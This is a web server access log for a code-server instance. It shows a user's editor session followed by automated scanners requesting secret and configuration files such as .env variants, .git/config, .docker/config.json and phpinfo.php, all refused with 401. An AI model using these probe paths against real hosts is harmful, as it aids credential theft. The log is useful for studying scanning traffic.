"Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.css" +[19/Jan/2026:23:39:35 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/media/letterpress-light.svg" [Client 37.76.11.249] [Length 299] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.css" +[19/Jan/2026:23:39:36 +0000] - 200 200 - GET https code.profibot.hu "/update/check" [Client 37.76.11.249] [Length 80] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:36 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=5e7698ba-7a86-4202-a326-35c341af1bcb" [Client 37.76.11.249] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:36 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/media/codicon.ttf?5d4d76ab2ce5108968ad644d591a16a6" [Client 37.76.11.249] [Length 59438] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.css" +[19/Jan/2026:23:39:36 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/editor/common/services/editorWebWorkerMain.js" [Client 37.76.11.249] [Length 103523] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:23:39:36 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/api/worker/extensionHostWorkerMain.js" [Client 37.76.11.249] [Length 435761] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:23:39:36 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/templates.png" [Client 37.76.11.249] [Length 46748] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:36 +0000] - - 499 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=8c2d0009-6c45-46c8-8576-f4e5784e2d46&parentId=1&origin=8c2d0009-6c45-46c8-8576-f4e5784e2d46&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" [Client 37.76.11.249] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:37 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=9268ac40-f18b-4982-9338-1e6956354574&parentId=1&origin=9268ac40-f18b-4982-9338-1e6956354574&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" [Client 37.76.11.249] [Length 11498] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:37 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" [Client 37.76.11.249] [Length 2406] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=9268ac40-f18b-4982-9338-1e6956354574&parentId=1&origin=9268ac40-f18b-4982-9338-1e6956354574&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" +[19/Jan/2026:23:39:37 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/fake.html?id=9268ac40-f18b-4982-9338-1e6956354574" [Client 37.76.11.249] [Length 117] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=9268ac40-f18b-4982-9338-1e6956354574&parentId=1&origin=9268ac40-f18b-4982-9338-1e6956354574&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" +[19/Jan/2026:23:39:38 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-defaults%2Fthemes%2Flight_modern.json&tkn=" [Client 37.76.11.249] [Length 1393] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:38 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-seti%2Ficons%2Fvs-seti-icon-theme.json&tkn=" [Client 37.76.11.249] [Length 7574] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:38 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/welcomeGettingStarted/common/media/dark.png" [Client 37.76.11.249] [Length 10586] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=9268ac40-f18b-4982-9338-1e6956354574&parentId=1&origin=9268ac40-f18b-4982-9338-1e6956354574&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" +[19/Jan/2026:23:39:38 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/welcomeGettingStarted/common/media/light.png" [Client 37.76.11.249] [Length 10174] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=9268ac40-f18b-4982-9338-1e6956354574&parentId=1&origin=9268ac40-f18b-4982-9338-1e6956354574&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" +[19/Jan/2026:23:39:38 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-defaults%2Fthemes%2Flight_plus.json&tkn=" [Client 37.76.11.249] [Length 1034] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:38 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/welcomeGettingStarted/common/media/dark-hc.png" [Client 37.76.11.249] [Length 10635] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=9268ac40-f18b-4982-9338-1e6956354574&parentId=1&origin=9268ac40-f18b-4982-9338-1e6956354574&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" +[19/Jan/2026:23:39:38 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/welcomeGettingStarted/common/media/light-hc.png" [Client 37.76.11.249] [Length 10635] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=9268ac40-f18b-4982-9338-1e6956354574&parentId=1&origin=9268ac40-f18b-4982-9338-1e6956354574&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" +[19/Jan/2026:23:39:38 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-seti%2Ficons%2Fseti.woff&tkn=" [Client 37.76.11.249] [Length 37313] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:38 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-defaults%2Fthemes%2Flight_vs.json&tkn=" [Client 37.76.11.249] [Length 1849] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:41 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.11.249] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[19/Jan/2026:23:39:41 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" [Client 37.76.11.249] [Length 2406] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" +[19/Jan/2026:23:39:55 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=7f4f9863-edfb-451d-b2f7-7ee04b62a1d8&reconnection=false&skipWebSocketFrames=false" [Client 37.76.11.249] [Length 11341] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:23:39:55 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=bc07b6d0-5db2-4ff7-8e43-28100908b986&reconnection=false&skipWebSocketFrames=false" [Client 37.76.11.249] [Length 919457] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:23:41:58 +0000] - 401 401 - GET https code.profibot.hu "/.git/config" [Client 185.196.8.135] [Length 601] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://chat.openai.com/" +[19/Jan/2026:23:46:11 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 64.15.129.101] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[19/Jan/2026:23:46:11 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 64.15.129.101] [Length 2621] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://code.profibot.hu/" +[19/Jan/2026:23:46:12 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 64.15.129.106] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[19/Jan/2026:23:46:12 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 64.15.129.106] [Length 2621] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://code.profibot.hu/" +[19/Jan/2026:23:46:13 +0000] - 401 401 - GET http code.profibot.hu "/favicon.ico" [Client 192.175.111.245] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[19/Jan/2026:23:46:13 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 192.175.111.244] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[19/Jan/2026:23:46:13 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 192.175.111.244] [Length 2621] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://code.profibot.hu/" +[19/Jan/2026:23:46:14 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 192.175.111.244] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[19/Jan/2026:23:46:14 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 192.175.111.244] [Length 2621] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/" +[19/Jan/2026:23:46:14 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 192.175.111.248] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[19/Jan/2026:23:46:14 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 192.175.111.248] [Length 2621] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://code.profibot.hu/" +[19/Jan/2026:23:50:07 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 91.231.89.22] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" +[20/Jan/2026:00:19:36 +0000] - 200 200 - GET https code.profibot.hu "/robots.txt" [Client 74.7.175.131] [Length 26] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[20/Jan/2026:00:21:19 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 34.6.40.224] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1; rv:115.0.1) Gecko/20100101 Firefox/115.0.1" "-" +[20/Jan/2026:00:21:19 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 34.6.40.224] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1; rv:115.0.1) Gecko/20100101 Firefox/115.0.1" "-" +[20/Jan/2026:00:23:34 +0000] - 401 401 - HEAD https code.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:00:23:34 +0000] - 401 401 - HEAD https code.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:00:23:34 +0000] - 401 401 - HEAD https code.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:00:23:34 +0000] - 401 401 - HEAD https code.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/polyfills.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/netlify.env" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/shop/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/environment.txt" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/app/root.tsx" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/2.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.config/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/dist/main.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/~/.gitconfig" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.cache/page-ssr/routes/render-page.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/settings.sample.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/phpinfo-2.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/build/static/js/main.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.env.live" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/public/build/root.js" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.phpinfo.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/cgi-bin/info.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.env" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/phpinfo.php8" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.env.dev" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.env.prod" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/src/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.docker/config.json" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/wp-content/plugins/woocommerce/.env" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.nuxt/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.heroku/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/shippable.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/assets/index.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/admin/phpinfo.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/render/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/phpinfo.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/pub/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.vite/deps/_metadata.json" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https 